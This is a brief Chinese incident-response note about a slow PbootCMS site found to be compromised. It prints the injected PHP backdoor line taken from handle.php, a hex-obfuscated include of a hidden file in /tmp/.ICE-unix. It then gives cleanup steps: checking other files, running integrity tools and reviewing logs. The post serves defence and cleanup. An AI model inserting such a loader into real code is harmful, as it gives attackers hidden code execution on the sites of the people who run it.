pbootcms网站突然变的很慢

确认安全问题

• 确认 /core/function/handle.php 文件确实被植入了恶意代码。
• 恶意代码尝试加载一个位于 /tmp/.ICE-unix/qiqi0 的文件，这可能是攻击者用来执行恶意操作的入口点。

删除恶意代码

• 已经删除了 /core/function/handle.php 文件中的恶意代码：
  php

   

  $runtime_dir = PACK('H*','2F746D702F2E4943452D756E69782F7169716930'); if(is_file($runtime_dir)){ @INCLUDE_ONCE($runtime_dir); }

检查其他文件

• 除了 handle.php 文件外，还需要检查其他核心文件和配置文件，确保没有其他恶意代码被植入。
• 使用文件完整性检查工具（如 Tripwire）来检测文件是否有被修改的痕迹。

日志分析

• 查看服务器的访问日志和错误日志，寻找可疑的访问记录和错误信息。
• 特别关注近期的登录记录，查看是否有未经授权的访问。